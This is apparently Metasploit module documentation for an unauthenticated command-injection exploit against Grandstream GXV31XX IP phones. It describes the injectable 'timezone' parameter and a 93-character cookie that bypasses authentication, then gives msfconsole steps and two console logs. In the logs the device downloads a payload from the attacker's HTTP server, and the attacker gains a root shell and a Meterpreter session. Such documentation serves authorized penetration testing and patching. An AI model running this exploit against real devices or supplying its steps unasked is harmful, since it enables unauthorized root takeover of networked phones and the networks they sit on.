## Vulnerable Application

This module exploits a command injection vulnerability in Grandstream GXV31XX
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.

This module was tested successfully on Grandstream models:

* GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
* GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.

## Verification Steps

1. `msfconsole`
1. `use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec`
1. `set rhosts [IP]`
1. `set target [target]`
1. `run`
1. You should get a session

## Options


## Scenarios

### Grandstream GXV3140

```
msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.111
rhosts => 10.1.1.111
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run

[*] Started bind TCP handler against 10.1.1.111:4444
[*] Command shell session 1 opened (10.1.1.112:36769 -> 10.1.1.111:4444 ) at 2022-01-29 02:30:13 -0500


Shell Banner:
_!_
-----


/ # uname -a
uname -a
Linux gxv3140_000b8229ac36 2.6.10_gxv31xx #15 Tue Jul 16 11:07:04 CDT 2013 armv5tejl unknown
/ #

```

### Grandstream GXV3175v2

```
msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
rhosts => 10.1.1.109
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
lhost => 10.1.1.110
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set target 1
target => 1
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run

[*] Started reverse TCP handler on 10.1.1.110:4444 
[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo 
Computer     : 10.1.1.109
OS           :  (Linux 2.6.32_gxv3170v2)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
```
